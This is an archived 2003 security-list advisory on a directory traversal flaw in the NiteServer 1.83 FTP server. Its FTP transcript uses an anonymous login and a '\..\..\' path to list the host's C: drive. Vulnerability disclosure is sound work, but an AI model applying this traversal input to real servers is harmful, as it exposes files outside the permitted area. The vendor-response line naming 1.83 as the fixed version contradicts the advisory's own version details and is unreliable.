[VulnWatch] Directory traversal vulnerabilities found in NITE ftp-server version 1.83
From: matrix@infowarfare.dk
Date: 01/15/03
- Previous message: Shayne Sivley: "RE: [VulnWatch] Assorted Trend Vulns Rev 2.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 15 Jan 2003 13:10:46 +0100 From: matrix@infowarfare.dk To: undisclosed-recipients:;
Directory traversal vulnerabilities found in
NITE ftp-server version 1.83
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
SUMMARY
The NiteServer is a simple FTP-Server program with some special features.
It is free and easy to use.
The following commands are recognized :
USER PORT RETR REST
PASS STOR CWD DELE
HELP LIST
so it should work with any usual ftp-client.
Special Download-Ratio features are implemented.
User-logins are logged with their IP-Number, so the Up/Download-Ratio
will be held for the future. Spy users, watch what they are up- or downloading.
Are you interested in learning Visual Basic Internet programming ?
Do you need some different features ?
You can purchase the source-code (VB 6.0) from the Author.
Simply send a check about 25 US-$ to
A directory traversal vulnerability in the product allows remote attackers to
cause
the server to traverse into directories that reside outside the bounding
FTP root directory.
DETAILS
Vulnerable systems:
Windows NT 4.0 and Windows 2000 server fully patched
* Niteserver Version:1.83 - Author:Thomas Krebs
Immune systems:
* NiteServer version 1.85
NiteServer failure to filter out "\.." sequences in command requests allows
remote users to break out of restricted directories and gain read access
to the system directory structure; Possibility for discovering the directory
structure outside the configured areas.
The following transcript demonstrates a sample exploitation of the
vulnerabilities:
Connected to 192.168.1.22.
220- Niteserver Version:1.83
220- Author:Thomas Krebs
220- email: turtie@knuut.de
220- Welcome to the Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.
Detection:
Niteserver Version:1.83 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.
Vendor response:
Niteserver Version:1.83 fixes this issue. The latest version is
available from come.to/niteserversite
Disclosure timeline:
12/12/2002 Found the Vulnerability.
12/12/2002 Author notified (turtie@knuut.de)
01/13/2003 No Responses received from turtie@knuut.de
01/13/2003 Public Disclosure.
ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix@infowarfare.dk> Dennis Rand
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/
- Next message: Rain Forest Puppy: "[VulnWatch] Followup to Gobbles post"
- Previous message: Shayne Sivley: "RE: [VulnWatch] Assorted Trend Vulns Rev 2.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
